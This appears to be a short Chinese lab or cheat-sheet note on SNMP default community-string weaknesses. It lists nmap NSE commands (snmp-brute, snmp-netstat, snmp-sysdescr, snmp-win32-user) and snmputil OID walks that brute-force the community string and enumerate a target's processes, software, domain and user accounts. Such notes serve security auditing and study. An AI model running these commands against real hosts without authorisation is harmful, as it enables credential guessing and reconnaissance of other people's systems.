snmp默认团体名/弱口令漏洞

1. 检测与利用
   snmp默认团体名属于snmp默认弱口令public/privicy。在win7本机上开启snmp服务，并添加pubilc团体名和允许远程连接后（window默认没有接受的团体名也就是社团名称，且不允许远程连接）

#通过nmap自带的审计脚本对snmp安全审计
弱口令检测：nmap –sU –p161 –script=snmp-brute 目标ip //查找snmp弱口令

弱口令利用：nmap -sU -p161 --script=snmp-netstat 目标ip//获取网络端口状态

nmap –sU –p161 –script=snmp-sysdescr 目标ip //获取系统信息

nmap -sU -p161 --script=snmp-win32-user 目标ip //获取用户信息

2. 通过snmputil.exe获取信息

snmputil walk ip public .1.3.6.1.2.1.25.4.2.1.2//列出系统进程

snmputil walk ip public.1.3.6.1.2.1.25.6.3.1.2 //列出安装的软件

snmputil walk ip public .1.3.6.1.2.1.1 //列出系统信息

snmputil get  ip public .1.3.6.1.4.1.77.1.4.1.0 //列出域名

snmputil walk ip public.1.3.6.1.4.1.77.1.2.25.1.1 //列系统用户列表